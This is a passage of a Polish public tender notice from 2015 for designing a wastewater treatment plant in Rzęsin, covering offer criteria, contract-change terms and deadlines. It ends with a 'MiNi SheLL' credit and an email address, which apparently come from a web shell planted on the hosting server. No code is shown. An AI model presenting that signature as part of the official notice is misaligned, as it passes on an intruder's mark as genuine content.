<p>1. W celu umożliwienia dokonania oceny oferty w kryterium parametry techniczno-ekonomiczne ciągu  
    technologicznego, opisanym w rozdziale XIII SIWZ, Wykonawca winien złożyć wypełnioną  Kartę  
    oferowanych rozwiązań technicznych wraz z wybranymi miernikami kosztu ciągu technologicznego 
    projektowanej oczyszczalni ścieków w Rzęsinie, do wykorzystania przez Zamawiającego przy ocenie 
    oferty Wykonawcy, sporządzoną z wykorzystaniem wzoru stanowiącego Załącznik nr 7 do SIWZ.
2. Zgodnie z zaleceniem w rozdziale VIII ust. 5 pkt 1) i 2) SIWZ, dowód wniesienia wadium. 
3. W przypadku podpisania oferty oraz poświadczenia za zgodność z oryginałem kopii dokumentów przez 
    osobę niewymienioną w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty 
    dołączyć stosowne pełnomocnictwo w oryginale lub kopii poświadczonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Suma kosztu netto [zł] urządzeń wraz z montażem, przewidywanych do zaprojektowania w ciągu technologicznym - 15</li>
<li>3 - Kontenerowy reaktor SBR - 3</li>
<li>4 - inne rozwiązanie modułowe - 1</li>
<li>5 - złoże zanurzone - 2</li>
<li>6 - inne rozwiązanie - 1</li>
<li>7 - reaktor podziemny - 2</li>
<li>8 - reaktor nadziemny - 1</li>
<li>9 - Energochłonność [kWh/rok] urządzeń ciągu technologicznego (zużycie energii elektrycznej) - 10</li>
<li>10 - Trwałość reaktora [w latach] deklarowana przez producenta - 5</li>
<li>11 - Czas przeznaczony na bieżącą obsługę urządzeń oczyszczalni, wynikający z instrukcji obslugi [liczba roboczogodzin/rok] - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- w zakresie zmiany wynagrodzenia:
a) jeżeli nastąpi urzędowa zmiana podatku VAT od towarów i usług;
- w zakresie zmiany terminu wykonania umowy:
b) jeżeli wystąpią opóźnienia wynikające z dłuższego niż niezwłoczny w rozumieniu KPA, czas trwania procedur administracyjnych i uzgodnieniowych, których przebieg jest niezależny od Wykonawcy                          i Zamawiającego, i których wydłużenie się może być spowodowane opieszałością instytucji, organów lub niekorzystnym wpływem osób trzecich (np. protesty), a Wykonawca wykaże Zamawiającemu na piśmie,                że wystąpienie tych zdarzeń uzasadnia zmianę terminu wykonania umowy.
c) jeżeli wystąpi potrzeba wykonania dodatkowych opracowań nakazanych decyzjami określonych instytucji i organów administracyjnych, nie przewidzianych w umowie przez Wykonawcę i Zamawiającego,                         a koniecznych do uzyskania pozwolenia na budowę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.zgk.gryfice.eu/zamowienia/pokaz/57.dhtml<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Usług Komunalnych                    w Gryficach, ul. Zielona 5, 72-300 Gryfice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2015 godzina 10:00, miejsce: Zakład Usług Komunalnych w Gryficach, ul. Zielona 5, budynek Zarządu, pok. nr 4 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com